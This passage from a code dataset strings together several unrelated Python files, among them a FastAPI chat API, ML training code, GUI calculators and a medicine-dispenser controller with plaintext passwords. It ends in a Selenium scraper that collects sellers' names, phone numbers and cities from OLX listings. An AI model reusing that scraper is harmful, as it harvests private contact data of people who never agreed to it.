(all_restarted)\n print (\"Alive ==> \"),\n print (alive)\n\n if len(all_restarted) == 0 :\n print (\" All network is alive \")\n print (\"---------\")\n else:\n print (\" All restarted network \")\n print (all_restarted)\n print (\"---------\")","sub_path":"python/src/network/script_checker.py","file_name":"script_checker.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"268574757","text":"# Iterative method\ndef addDigits(num):\n digital_root = 0\n while num > 0:\n digital_root += num % 10\n num //= 10\n\n if num == 0 and digital_root > 9:\n num = digital_root\n digital_root = 
0\n \n return digital_root\n\n# Recursive method\ndef addDigits1(num):\n if num < 9:\n return num\n\n digital_root = 0\n while num > 0:\n digital_root += num % 10\n num //= 10\n\n return addDigits1(digital_root)\n\n# Mathematics solution\ndef addDigits2(num):\n if num == 0:\n return 0\n elif num % 9 == 0:\n return 9\n else:\n return num % 9\n\n# one liner solution for addDigits2\ndef addDigits3(num):\n return (num % 9 or 9) if num else 0\n\n# If we combine last 2 cases of mathematics solution\ndef addDigits4(num):\n if num == 0:\n return 0\n else:\n return 1 + (num - 1) % 9\n\n# One liner solution for addDigits4\ndef addDigits5(num):\n return 1 + (num - 1) % 9 if num else 0\n \n\nprint(addDigits5(38))","sub_path":"july-leetcoding-challenge/D26-AddDigits.py","file_name":"D26-AddDigits.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"157758188","text":"from typing import Pattern\nimport uvicorn\n\nfrom fastapi import Depends, FastAPI, HTTPException\nimport os\n# from fastapi_sqlalchemy import DBSessionMiddleware\n# from fastapi_sqlalchemy import db\nimport models\n# from models import User as baseuser, Mobile,Channel,Group,Message\nimport schema\nfrom dotenv import load_dotenv\nfrom sqlalchemy.orm import Session, session\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nload_dotenv(os.path.join(BASE_DIR, \".env\"))\nfrom database import SessionLocal, engine\nimport uuid\nfrom sqlalchemy import or_\nfrom datetime import datetime\nimport re\nmodels.Base.metadata.create_all(bind=engine)\n\napp = FastAPI()\n# Dependency\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n\n\n\n@app.post(\"/mobile/\", response_model=schema.Mobile)\ndef create_mobile(mobile: schema.Mobile, db: Session = Depends(get_db)):\n '''\n API Name: create_mobile\n purpose : To add a valid 10 digit number that starts wih 7or 8 or 9\n permission : permission not 
required\n parameters :\n number = string (of 10 digits)\n request body :\n \"number\" : \"9989988988\"\n response body :\n {\n \"number\" : \"9989988988\"\n } \n '''\n number = re.fullmatch(\"[7-9]\\d{9}\",mobile.number)\n if not number:\n raise HTTPException(status_code=400, detail=\"please add valid number\")\n db_mobile = models.Mobile(number=mobile.number)\n db.add(db_mobile)\n db.commit()\n db.refresh(db_mobile)\n return db_mobile\n\n\n@app.post(\"/bulkmobile/\")\ndef create_BulkMobile(db: Session= Depends(get_db)):\n '''\n API Name: create_BulkMobile\n Method : POST\n purpose : To create 9 numbers for easily adding\n permission : permission not required\n parameters :\n None\n request body :\n None\n response body :\n {\n \"data\": None,\n \"message\": \"Success\"\n } \n '''\n mobileList = ['9123456784','8123456784','7123456785',\n '9080390801','9080123456','9123456789',\n '9080790807','9123456780','7878789089']\n try:\n for number in mobileList:\n db_mobile = models.Mobile(number= number)\n db.add(db_mobile)\n db.commit()\n return {\"data\":None,\"message\":\"Success\"}\n except Exception as e:\n db.rollback()\n raise HTTPException(status_code=400, detail=str(e))\n\n\n@app.get(\"/getNumber/{current_number}\")\ndef get_number(current_number: str ,db: Session= Depends(get_db)):\n '''\n API Name: get_number\n Method: GET\n purpose : To get all the numbers other than the given number\n permission : permission not required\n parameters :\n current_number = string (of 10 digits)\n request body :\n \"current_number\" : \"9989988988\"\n response body :\n {\n \"data\": [\n \"9123456784\",\n \"8123456784\",\n \"7123456785\",\n \"9086012345\",\n \"90860123456\",\n \"908601234567\"\n ],\n \"message\": \"Success\"\n }\n '''\n try:\n mobileList = []\n mobiles = db.query(models.Mobile).filter(models.Mobile.number!= current_number).all()\n for mobile in mobiles:\n mobileList.append(mobile.number)\n return {\"data\":mobileList,\"message\":\"Success\"}\n except Exception as 
e:\n raise HTTPException(status_code=400, detail=str(e))\n\n\n@app.get(\"/checkConnection/{current_number}/{other_number}\")\ndef get_connection(current_number: str, other_number: str, db: Session = Depends(get_db)):\n try:\n groupName1 = current_number+\"-\"+other_number\n groupName2 = other_number+\"-\"+current_number\n try:\n checkGroup = db.query(models.Channel).filter(or_(models.Channel.channelName == groupName1,models.Channel.channelName == groupName2)).one()\n messageList = []\n messages = db.query(models.Message).join(models.Mobile, models.Message.mobile_id == models.Mobile.id).filter(models.Message.channel_id == checkGroup.id).order_by(models.Message.createdTime.desc()).all()\n for message in messages:\n data = {\n \"sender\" : message.mobile.number,\n \"message\": message.message,\n \"messageId\": message.messageID,\n \"reciever\": other_number if message.mobile.number == current_number else current_number,\n \"createdTime\": datetime.timestamp(message.createdTime)\n }\n messageList.append(data)\n currentUser = db.query(models.Mobile).filter(models.Mobile.number == current_number).one() \n finalData = {\n \"messageList\" : messageList,\n \"mobile_id\" : currentUser.id,\n \"channel_id\" : checkGroup.id\n }\n return {\"data\":finalData,\"message\":\"Success\"}\n except:\n \n checkGroup = db.query(models.Channel).filter(or_(models.Channel.channelName == groupName1,models.Channel.channelName == groupName2)).count()\n if checkGroup:\n raise HTTPException(status_code=400, detail=\"Something went wrong\")\n \n db_channel = models.Channel(channelName=groupName1)\n db.add(db_channel)\n db.commit()\n db.refresh(db_channel)\n try:\n numberList = [current_number, other_number]\n for i in numberList:\n mobile = db.query(models.Mobile).filter(models.Mobile.number ==i).one()\n db_group = models.Group(mobile_id=mobile.id,Channel_id=db_channel.id)\n db.add(db_group)\n db.commit()\n currentUser = db.query(models.Mobile).filter(models.Mobile.number == 
current_number).one()\n finalData = {\n \"messageList\" : [],\n \"mobile_id\" : currentUser.id,\n \"channel_id\" : db_channel.id\n }\n return {\"data\":finalData,\"message\":\"Success\"}\n except Exception as e:\n db.rollback()\n raise HTTPException(status_code=500, detail=str(e))\n except Exception as e:\n raise HTTPException(status_code=400, detail=str(e))\n\n\n@app.post(\"/createMessage/\")\ndef create_message(message: schema.Message, db: Session= Depends(get_db)):\n '''\n API Name: create_message\n purpose : To write a message in particular channel\n Method : POST\n permission : permission not required\n parameters :\n message = string\n mobile_id = int\n channel_id = int\n request body :\n {\n \"message\": \"string\",\n \"channel\": 0,\n \"mobile\": 0\n }\n response body :\n {\n \"data\" : \"Success\"\n } \n '''\n try:\n db_message = models.Message(message= message.message, channel_id=message.channel,mobile_id = message.mobile)\n db.add(db_message)\n db.commit()\n return {\"data\":\"success\"}\n except Exception as e:\n raise HTTPException(status_code=400, detail=str(e))\n\n\n@app.get(\"/getmessages/{channel_id}\")\ndef get_messages(channel_id:int, db: Session= Depends(get_db)):\n try:\n messageList = []\n messages = db.query(models.Message).filter(models.Message.channel_id == channel_id).all()\n for message in messages:\n messageList.append(message)\n return {\"data\":messageList,\"message\":\"success\"}\n except Exception as e:\n raise HTTPException(status_code=400, detail=str(e))\n\n\nif __name__ == \"__main__\":\n uvicorn.run(app, host=\"0.0.0.0\", port=8000)\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"129068614","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom chainer import optimizer as optimizer_module\nfrom chainer import variable\nfrom chainer.dataset import iterator as 
iterator_module\nfrom chainer.dataset import convert\nfrom chainer.training import StandardUpdater\n\nimport copy\nimport six\n\n\nclass ParallelUpdater(StandardUpdater):\n\n def __init__(self, iterator, optimizer, converter=convert.concat_examples,\n models=None, devices=None, loss_func=None):\n super(ParallelUpdater, self).__init__(\n iterator=iterator,\n optimizer=optimizer,\n converter=converter,\n loss_func=loss_func,\n )\n\n if models is None:\n if devices is None:\n raise ValueError('either models or devices must be specified')\n names = list(six.iterkeys(devices))\n\n try:\n names.remove('main')\n except ValueError:\n raise KeyError(\"'devices' must contain a 'main' key.\")\n\n models = {'main': optimizer.target}\n for name in names:\n model = copy.deepcopy(optimizer.target)\n if devices[name] >= 0:\n model.to_gpu(devices[name])\n models[name] = model\n if devices['main'] >= 0:\n optimizer.target.to_gpu(devices['main'])\n\n self._devices = devices\n self._models = models\n\n def connect_trainer(self, trainer):\n # Add observers for all (other) models.\n model_main = self.get_optimizer('main').target\n models_others = {\n k: v for k, v in self._models.items() if v != model_main\n }\n for name, model in models_others.items():\n trainer.reporter.add_observer(name, model)\n\n def update_core(self):\n optimizer = self.get_optimizer('main')\n model_main = optimizer.target\n models_others = {k: v for k, v in self._models.items()\n if v is not model_main}\n\n batch = self.get_iterator('main').next()\n\n #\n # Split the batch to sub-batches.\n #\n n = len(self._models)\n in_arrays_list = {}\n for i, key in enumerate(six.iterkeys(self._models)):\n in_arrays_list[key] = self.converter(\n batch[i::n], self._devices[key])\n\n # For reducing memory\n for model in six.itervalues(self._models):\n model.cleargrads()\n\n losses = []\n for model_key, model in six.iteritems(self._models):\n in_arrays = in_arrays_list[model_key]\n loss_func = self.loss_func or model\n\n if 
isinstance(in_arrays, tuple):\n in_vars = tuple(variable.Variable(x) for x in in_arrays)\n losses.append(loss_func(*in_vars))\n elif isinstance(in_arrays, dict):\n in_vars = {key: variable.Variable(x)\n for key, x in six.iteritems(in_arrays)}\n losses.append(loss_func(**in_vars))\n else:\n in_vars = variable.Variable(in_arrays)\n losses.append(loss_func(in_vars))\n\n for i in range(4):\n # For _uninitialized_params\n for model in six.itervalues(self._models):\n model.zerograds()\n\n for loss in losses:\n loss[i].backward()\n\n for model in six.itervalues(models_others):\n model_main.addgrads(model)\n\n optimizer.update()\n\n for model in six.itervalues(models_others):\n model.copyparams(model_main)\n","sub_path":"python/mitmul_chainer-faster-rcnn/chainer-faster-rcnn-master/updater.py","file_name":"updater.py","file_ext":"py","file_size_in_byte":3591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"531205051","text":"from pymongo import MongoClient\ndb=MongoClient()['session_edgenie']\ndata=list(db['maths_qn'].find())\ntag_converter={\n \"Inequalities\":\"Inequality\",\n \"Percent and Interest Problems\":'Percent-Interest',\n \"Absolute Values/Modules\":'Absolute_value',\n \"Number Properties\":'Number_property',\n \"Coordinate Geometry\":'Coordinate_geometry',\n \"Exponents/Powers\":'Exponent',\n \"Functions and Custom Characters\":'Function',\n \"Arithmetic\":'Arithmetic',\n \"Remainders\":'Remainder',\n \"Algebra\":'Algebra',\n \"Work/Rate Problems\":'Work-Rate',\n \"Geometry\":'Geometry',\n \"Combinations\":'Combinatorics',\n \"Poor Quality\":'',\n \"Mixture Problems\":'Proportion-Mixture',\n \"Out of Scope - Too Hard\":'Hard',\n \"Graphs and Illustrations\":'Graph-Diagrammatic',\n \"Divisibility/Multiples/Factors\":'Divisibility-Factor-Multiple',\n \"Word Problems\": 'Word_problem',\n \"Fractions/Ratios/Decimals\": 'Fraction--Decimal-Ratio',\n \"Overlapping Sets\": 'Sets-Overlapping',\n \"Probability\": 
'Probability',\n \"Statistics and Sets Problems\": 'Set-Statistics',\n \"Distance/Rate Problems\": 'Rate-Sistance',\n \"Min/Max Problems\": 'Minimum-Maximum',\n \"Sequences\": 'Sequence',\n \"Must or Could be True Questions\": 'Must_be_true',\n \"Percents and Interest Problems\":'Percent-Interest',\n \"Roots\": 'Root',\n}\nfor i in data:\n i['tags']=[tag_converter[j] for j in i['tags']]\ndb['maths_qn'].drop()\ndb['maths_qn'].insert(data)\n","sub_path":"update_tags.py","file_name":"update_tags.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"492890212","text":"import cv2\nimport numpy as np\nimport pytesseract\nimport PIL\nimport ocr_testing\n\n\npin_tmpl = cv2.imread('img\\\\bank_tmpl.png')\nthreshold = .9\n\nfor i in range(29, 30):\n img_bgr = cv2.imread('screenshots\\\\fly_fish_{}.png'.format(i))\n img_gray = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2GRAY)\n dup_img = np.asarray(img_bgr.tolist() + img_bgr.copy().tolist())\n cv2.imshow('duplicate', dup_img)\n cv2.waitKey(0)\n res = cv2.matchTemplate(img_bgr, pin_tmpl, cv2.TM_CCOEFF_NORMED)\n loc = np.where(res > threshold)\n h, w = pin_tmpl.shape[:2]\n if len(list(zip(*loc[::-1]))):\n print(i)\n for pt in zip(*loc[::-1]):\n # cv2.rectangle(img_bgr, pt, (pt[0] + w, pt[1] + h), (255, 0, 0), 2)\n print(ocr_testing.img_to_text(img_gray[pt[1]+10:pt[1] + h, pt[0]+10:pt[0] + w], 100))\n # cv2.imshow('pin', img_bgr[pt[1]:pt[1] + h, pt[0]:pt[0] + w])\n # cv2.waitKey(0)\n\n # cv2.imshow('image', img_bgr)\n # cv2.waitKey(0)\n\nbody = ''\nbody += 'The current AQI for {param_name} is at {aqi}. Meaning that the air quality is {category}. 
' \\\n 'Please be advised not to do any streneous activity outside.\\n\\n'.format(param_name=param['ParameterName'],\n aqi=param['AQI'],\n category=param['Category']['Name'])\n","sub_path":"match_bank_pin.py","file_name":"match_bank_pin.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"18315673","text":"# Mohrs circle\nimport tkinter as tk\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nwindow = tk.Tk()\nwindow.title('Mohrs circle')\nwindow.geometry('800x750')\nTitle = tk.Label(window,text = 'This is a calculator to generate the correspond\\nMOHRS CIRCLE'\n ,font = ('ARial',20),width = 50, height = 2,bg = 'white')\nTitle.place(x = 0,y = 0,anchor = 'nw')\ni = 0\nimg = img = tk.PhotoImage(file = f'{i}-th.png')\ndef plot_circle(C_x,R):\n global i\n i += 1\n theta = np.arange(0,2*math.pi,0.001)\n theta = tuple(theta)\n circle_x = [C_x + R*math.cos(elem) for elem in theta]\n circle_y = [R*math.sin(elem) for elem in theta]\n plt.plot(circle_x,circle_y,label = f'{i}-th',linewidth = 1.0)\n \n plt.xlabel('sigma')\n plt.ylabel('tao')\n ax = plt.gca()\n ax.invert_yaxis()\n plt.legend(loc = 'best', fontsize = 9, title = f'{i}-th')\n plt.savefig(fname = f'{i}-th.png', format = \"png\")\n\ndef generate():\n global i\n global img\n var1 = float(E1.get())\n var2 = float(E2.get())\n var3 = float(E3.get())\n var4 = float(E4.get())\n R = math.pow(((var1 - var2)/2)**2 + var3**2,0.5)\n C_x = (var1 + var2)/2\n if C_x > 0:\n max1 = C_x + R\n else:\n max1 = abs(C_x - R)\n max2 = R\n plot_circle(C_x,R)\n img = tk.PhotoImage(file = f'{i}-th.png')\n img_now = canvas.create_image(300,160,anchor = 'center',image = img)\n lb1.insert('end',max1)\n lb2.insert('end',max2)\n\nP1 = tk.Label(window,text = 'The Sigma-X is : ',font = ('ARial',15)).place(x = 70,y = 80)\nP2 = tk.Label(window,text = 'The Sigma-Y is : ',font = ('ARial',15)).place(x = 420,y = 80)\nP3 = 
tk.Label(window,text = 'The Tao-XY is : ',font = ('ARial',15)).place(x = 70,y = 120)\nP4 = tk.Label(window,text = 'The theta is : ',font = ('ARial',15)).place(x = 420,y = 120)\nA1 = tk.Label(window,text = 'The max sigma is :',font = ('ARial',15)).place(x = 100,y = 560)\nA2 = tk.Label(window,text = 'The max tao is : ',font = ('ARial',15)).place(x = 480,y = 560)\n\nE1 = tk.Entry(window)\nE1.place(x = 260,y = 86)\nE2 = tk.Entry(window)\nE2.place(x = 610,y = 86)\nE3 = tk.Entry(window)\nE3.place(x = 260,y = 126)\nE4 = tk.Entry(window)\nE4.place(x = 610,y = 126)\n\nlb1 = tk.Listbox(window,width = 20,height = 5,font = ('ARial',15))\nlb1.place(x = 100,y = 590)\nlb2 = tk.Listbox(window,width = 20,height = 5,font = ('ARial',15))\nlb2.place(x = 480,y = 590)\n\ncanvas = tk.Canvas(window,bg = 'white',height = 300,width = 600)\nGenerate = tk.Button(window,text = 'Generate the circle',width = 30,height = 1\n ,font = ('ARial',15),bg = 'yellow',command = generate).place(x = 400,y = 200,anchor = 'center')\n\nimg_now = canvas.create_image(300,160,anchor = 'center',image = img)\ncanvas.place(x = 400,y = 400,anchor = 'center')\n\nwindow.mainloop()","sub_path":"工程力學/Mohrs_circle.py","file_name":"Mohrs_circle.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"72189760","text":"import threading\nimport hashlib\nimport arduino\nimport control\nimport database\nimport calendar\nimport time\nfrom prescription import Prescription\nfrom user import User\nfrom preferences import Preferences\nimport sys\n\n# Setup Variables\npref = Preferences()\nrunning = False\nthreads = []\n\n# Check if this is the first-run\nif pref.get_preference(\"first_time\", True):\n import sampledata\n\n # Set some default preferences\n pref.set_preference(\"first_time\", False)\n pref.set_preference(\"database\", \"data/database.db\")\n pref.set_preference(\"arduino_port\", \"COM3\")\n 
pref.set_preference(\"notifications\", False)\n\n # Create the database and fill it with some data\n sampledata.init()\n\n\n# Communication Thread\nclass communicationThread(threading.Thread):\n def __init__(self, threadID, name):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n\n def run(self):\n global running, pref\n\n print(\"Starting \" + self.name)\n database.init(pref.get_preference(\"database\"))\n\n # Communication loop\n ard = arduino.Interface(b'ZxPEh7ezUDq54pRv', pref.get_preference(\"arduino_port\"))\n while running:\n if self._scanned_card(ard.read_rfid()):\n ard.send_accept()\n else:\n ard.send_reject()\n\n # threads.remove(self)\n print(\"Exiting \" + self.name)\n database.close()\n\n @staticmethod\n def _scanned_card(rfid):\n # Fetch a user from the database with the given UID\n user = control.get_user(rfid)\n\n # Return a REJECT if the user was not found\n if user is None:\n print(\"No user found with the RFID:\", rfid)\n return False\n\n print(\"User found:\", user.id)\n\n if user.role == 'pat':\n # If the user is a patient, get all prescriptions and the inventory\n prescriptions = control.get_prescriptions(user)\n inventory = control.get_inventory()\n\n # Show the dispensed drugs in the terminal\n if len(prescriptions) > 0:\n print(\"Dispensing \", len(prescriptions), \" medicine(s)\")\n\n for pres in prescriptions:\n for i in inventory:\n if pres.medicine_id == i.id:\n i.stock = i.stock - pres.amount\n database.update_inventory(i)\n drug = control.get_drug_by_prescription(pres)\n print(drug.name)\n print(\"\\tAmount:\\t\" + str(pres.amount))\n print(\"\\tDescription:\\t\" + pres.descr)\n database.commit()\n\n else:\n print(\"No prescriptions available for consumption at this moment\")\n\n if user.role == 'ref': # For doctor or nurse, assuming that they will only want to access the machine in order to refill it\n control.inventory_refill()\n print(\"Refilled the dispenser\")\n\n\n return True\n\n\n# Command 
prompt Thread\nclass promptThread(threading.Thread):\n def __init__(self, threadID, name):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n\n def run(self):\n print(\"Starting \" + self.name)\n global running\n global doctor_test\n global doctor_id\n doctor_test = False\n\n # Prompt loop\n while running:\n cmd = input(\"> \")\n if cmd == \"exit\":\n running = False\n database.close()\n print(\"Exiting now\")\n sys.exit(0)\n\n # command for logging in with username and password if the username and password are valid\n # doctor_test is set to true and doctor id is set to the corresponding id so the database can be edited\n if cmd == \"login\":\n doctors = database.get_users_by_role('doc')\n print(\"Please login to make changes.\")\n login_username = input(\"Username: \")\n login_password = input(\"Password: \")\n for doctor in doctors:\n if doctor.username == login_username and doctor.password == login_password:\n doctor_id = doctor.id\n print(\"Logged in as doctor id: \" + str(doctor_id))\n doctor_test = True\n if not doctor_test:\n print(\"Invalid credentials!\")\n\n # when logging out doctor test is set to false so no changes can be made\n # doctor id is set to 0 so nobody can actually see who was the last doctor to log in\n if cmd == \"logout\" and doctor_test:\n doctor_test = False\n print(\"Logged out as doctor id: \" + str(doctor_id))\n doctor_id = 0\n\n # to update credentials you must be logged in as a doctor and you have to verify your login data again\n if cmd == \"update credentials\" and doctor_test:\n user = database.get_user_by_uid(doctor_id)\n print(\"Please verify your login.\")\n login_username = input(\"Old username: \")\n login_password = input(\"Old password: \")\n if user.username == login_username and user.password == login_password:\n new_username = input(\"New username = \")\n new_password = input(\"New password = \")\n user.username = new_username\n user.password = new_password\n database.update_user(user)\n 
database.commit()\n print(\"Credentials updated.\")\n\n # to update a rfid tag you have to be logged in as a doctor and you have to input a user_id to which the new rfid will be bound\n if cmd == \"update rfid\" and doctor_test:\n user_id = input(\"User id = \")\n user = database.get_user_by_uid(user_id)\n if user is None:\n print(\"No user with this id!\")\n continue\n\n new_rfid = input(\"New rfid = \")\n user.rfid = new_rfid\n database.update_user(user)\n database.commit()\n print(\"rfid updated.\")\n\n # when logged in as a doctor you can get all users with their roles (but not password or rfid)\n if cmd == \"get users\" and doctor_test:\n users = database.get_users()\n print(\"id\\trole\")\n for user in users:\n print(str(user.id) + \"\\t\" + str(user.role))\n\n # when logged in you can get prescriptions for a single user or you can get all prescriptions\n if cmd == \"get prescriptions\" and doctor_test:\n choice = input(\"For all users y/n: \")\n prescriptions = database.get_prescriptions()\n if choice == \"y\":\n print(\"id\\tmedicine\\tdescription\")\n for prescription in prescriptions:\n print(str(prescription.id) + \"\\t\" + str(prescription.medicine_id) + \"\\t\\t\\t\" + str(prescription.descr))\n elif choice == \"n\":\n user_id = int(input(\"id = \"))\n print(\"id\\tmedicine\\tdescription\")\n for prescription in prescriptions:\n if prescription.uid == user_id:\n print(str(prescription.id) + \"\\t\" + str(prescription.medicine_id) + \"\\t\\t\\t\" + str(prescription.descr))\n else:\n print(\"Invalid input!\")\n\n # as a logged in doctor you can add prescriptions. 
you will be prompted for all the data\n if cmd == \"add prescription\" and doctor_test:\n prescriptions = database.get_prescriptions()\n prescription_list = []\n for prescription in prescriptions:\n prescription_list.append(prescription.id)\n prescription_id = int(max(prescription_list) + 1)\n patient_id = int(input(\"Patient id = \"))\n medicine_id = int(input(\"Medicine id = \"))\n description = input(\"Description of use = \")\n max_dose = int(input(\"Daily max dose = \"))\n min_time = int(input(\"Minimum time between dispenses in seconds = \"))\n amount = int(input(\"Amount of medicine per dispense/dose = \"))\n cur_dose = 0\n duration = int(input(\"Prescription duration in days = \")) * 86400\n date = int(calendar.timegm(time.gmtime()))\n\n # this part checks if the user is actually in the database else it prints \"patient does not exist\"\n users = database.get_users()\n patient_test = False\n for user in users:\n if patient_id == user.id:\n print(\"New prescription added with id: \" + str(prescription_id))\n database.insert_prescription(Prescription.parse_raw([prescription_id, patient_id, medicine_id, description, max_dose, min_time, amount, cur_dose, date, doctor_id, duration, date]))\n database.commit()\n patient_test = True\n if not patient_test:\n print(\"Patient does not exist!\")\n\n # as a logged in doctor you can remove a prescription by id\n if cmd == \"remove prescription\" and doctor_test:\n prescription_id = int(input(\"prescription id = \"))\n database.remove_prescription(prescription_id)\n database.commit()\n print(\"Prescription removed.\")\n\n # as a logged in doctor you can add new users. 
you get prompted for all data (and for username and pw if you are adding a doctor)\n if cmd == \"add user\" and doctor_test:\n users = database.get_users()\n user_list = []\n for user in users:\n user_list.append(user.id)\n user_id = int(max(user_list) + 1)\n rfid = int(input(\"RFID = \"))\n role = input(\"role(pat/doc/ref) = \")\n if role == 'doc':\n new_username = input(\"New user username = \")\n new_password = input(\"New user password = \")\n else:\n new_username = \"\"\n new_password = \"\"\n database.insert_user(User.parse_raw([user_id, rfid, role, new_username, new_password]))\n database.commit()\n print(\"New user added with id: \" + str(user_id))\n\n # as a logged in doctor you can remove users by id\n if cmd == \"remove user\" and doctor_test:\n user_id = int(input(\"User id = \"))\n database.remove_user(user_id)\n database.commit()\n print(\"User removed.\")\n\n # you can always print out all existing commands\n if cmd == \"help\":\n commands = [\"login\",\n \"logout\",\n \"exit\",\n \"get prescriptions\",\n \"add prescription\",\n \"remove prescription\",\n \"add user\",\n \"remove user\",\n \"update credentials\",\n \"update rfid\"]\n print(\"Commands:\", commands)\n\n\n # threads.remove(self)\n print(\"Exiting \" + self.name)\n\n\n# Communication Thread\nclass TimeModel(threading.Thread):\n def __init__(self, threadID, name):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n\n def run(self):\n print(\"Starting \" + self.name)\n # Imports\n import notification\n from concurrent.futures import thread\n\n # Make global variables available in local context\n global running, pref\n\n # Initialize everything\n\n database.init(pref.get_preference(\"database\"))\n\n # A refill every 24 hours\n refill = 24 * 60 * 60\n sleepy_time = 5\n\n cur_time = int(calendar.timegm(time.gmtime()))\n last_time = cur_time - (cur_time % refill)\n\n # Run the code\n while running:\n # Calculate next refill\n cur_time = 
int(calendar.timegm(time.gmtime()))\n new = last_time + refill\n\n # Refill?\n if cur_time > new:\n notification.send_refill()\n control.inventory_refill()\n last_time = new\n else: # Wait till refill\n time.sleep(sleepy_time)\n\n database.close()\n\n\n# Encrypt RFID-tag\ndef encryptRFID(tag):\n salt = 10 # TODO: replace with database UID or something\n encrypted = hashlib.sha512(salt + tag)\n\n\n# Main code\nprint(\"Starting Main Thread\")\n\nrunning = True\n\n# starting communication thread for communication with arduino\ncommunication_thread = communicationThread(1, \"Communication Thread\")\ncommunication_thread.start()\nthreads.append(communication_thread)\n\n# starting TimeModel thread for notifications\ntime_thread = TimeModel(3, \"Time Model Thread\")\ntime_thread.start()\nthreads.append(time_thread)\n\n# starting prompt thread for command prompt\nprompt_thread = promptThread(2, \"Prompt Thread\")\nprompt_thread.start()\nthreads.append(prompt_thread)\n\n# Wait for all threads to complete\nfor t in threads:\n t.join()\n\nprint(\"Exiting Main Thread\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"159516289","text":"from selenium import webdriver\nimport time\nimport random\nimport csv\n\nclass Search:\n\t\"\"\"Класс ищет по ключевым словам ссылки на объявления на сайте OLX.\t\n\tИ сохраняет их в txt файл под названиям urls.txt\t\n\tв томже каталоге\"\"\"\n\n\tdef __init__(self, search_words):\n\t\tself.search_words = search_words\n\t\tself.worker()\n\t\n\tdef worker(self):\n\t\tbrowser = webdriver.Firefox()\n\t\tbrowser.get(f'https://www.olx.ua/list/q-{self.search_words}')\n\t\ttry:\n\t\t\ttotal_page = int(browser.find_element_by_css_selector('#body-container > div:nth-child(3) > div > div.pager.rel.clr > span:nth-child(11) > a > span').text )\n\t\texcept:\n\t\t\ttotal_page = 2\n\t\t# поиск по страницам \n\t\tfor 
page in range(1,total_page):\n\t\t\tbrowser.get(f'https://www.olx.ua/list/q-{self.search_words}={page}')\n\t\t\telements = browser.find_elements_by_css_selector(\"#offers_table .offer-wrapper\")\n\t\t\tlist_href = [element.find_element_by_tag_name(\"a\").get_attribute('href') for element in elements]\n\t\t\t# сохранение в файл\n\t\t\twith open(f'urls{self.search_words}.txt', 'a', encoding='utf8') as f:\n\t\t\t\tfor i in list_href:\n\t\t\t\t\tf.write(i + '\\n')\n\t\t#time.sleep(random.choice(range(2,6))) # когда нужно подождать (wait не использую)\n\n\t\tbrowser.close()\n\nclass Main:\n\t\"\"\"Основной класс, который открывает файл с ссылками и переходит по каждой ис них\t\n\t\tвитегавает имя, номер телефона, город и сохраният в csv ��айл\"\"\"\n\tdef __init__(self, search_words):\n\t\tself.search_words = search_words\n\t\tself.worker()\n\n\tdef worker(self):\n\t\twith open(f'urls{self.search_words}.txt') as f:\n\t\t\turls = f.read().split('\\n')\n\n\t\tfor url in urls:\n\t\t\ttry:\n\t\t\t\titems = {}\n\t\t\t\tbrowser = webdriver.Firefox()\n\t\t\t\tbrowser.get(url)\n\t\t\t\tbrowser.find_element_by_css_selector('span.spoiler:nth-child(3)').click()\n\t\t\t\ttime.sleep(1.5)\n\t\t\t\ttry:\n\t\t\t\t\tbrowser.find_element_by_css_selector('span.spoiler:nth-child(3)').click()\n\t\t\t\t\ttime.sleep(1)\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t\t\ttry:\n\t\t\t\t\tbrowser.find_element_by_css_selector('span.spoiler:nth-child(3)').click()\n\t\t\t\t\ttime.sleep(1)\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t\t\titems['name'] = browser.find_element_by_css_selector(\".offer-user__details > h4:nth-child(1) > a:nth-child(1)\").text\n\t\t\t\tself.phone = browser.find_element_by_css_selector(\"div.contact-button\").text\n\t\t\t\tself.make_phone_format()\n\t\t\t\titems['phone'] = self.phone\n\t\t\t\tif 'Показать' in self.phone:\n\t\t\t\t\tcontinue\n\t\t\t\titems['city'] = [browser.find_element_by_css_selector(\".offer-user__address > address:nth-child(2) > 
